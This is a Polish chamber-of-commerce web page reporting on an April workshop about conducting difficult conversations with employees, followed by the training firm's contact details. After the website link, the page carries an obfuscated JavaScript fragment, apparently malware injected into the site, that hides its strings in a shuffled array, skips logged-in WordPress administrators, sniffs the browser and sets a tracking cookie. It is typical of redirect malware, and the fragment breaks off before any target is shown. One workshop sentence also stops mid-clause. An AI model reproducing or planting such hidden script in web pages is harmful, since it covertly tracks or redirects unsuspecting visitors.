Prowadzenie trudnych rozmów z pracownikami – relacja z warsztatów | Północna Izba Gospodarcza w Koszalinie

W środę 10 kwietnia w siedzibie Spektrum Szkolenia w Koszalinie odbyły się warsztaty z prowadzenia trudnych rozmów z pracownikami.

W pierwszej części szkolenia Pani Elżbieta Nell Chojnowska omówiła z uczestnikami problemy, z którymi borykają się przedstawiciele firm na co dzień oraz relację jakie tworzą pracownicy na różnych szczeblach w przedsiębiorstwie.

W dalszym etapie warsztatów uczestnicy poznali modele feedbacku, jakich słów kluczowych warto zastosować w czasie rozmowy, informację dotyczące komplementowania oraz zwracania uwagi w sytuacji popełnienia błędu przez pracownika. Kilkukrotnie zostało podkreślone w czasie warsztatów, że warto analizować fakty danej sytuacji a nie 

W kolejnej części szkolenia zostały przedstawione i omówione studia przypadków trudnych rozmów między kierownictwem a pracownikami niższego szczebla.

Dodatkowo omówiono zalety i wady motywacji pozapłacowej.

Bardzo dziękujemy wszystkim uczestnikom za przybycie i czynną aktywność.

Do zobaczenia na kolejnym szkoleniu!

 

Dodatkowe informację o firmie szkoleniowej:

Telefon: 697709556, 535 895 551
email: biuro@spektrum-szkolenia.pl

www.spektrum-szkolenia.pl 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m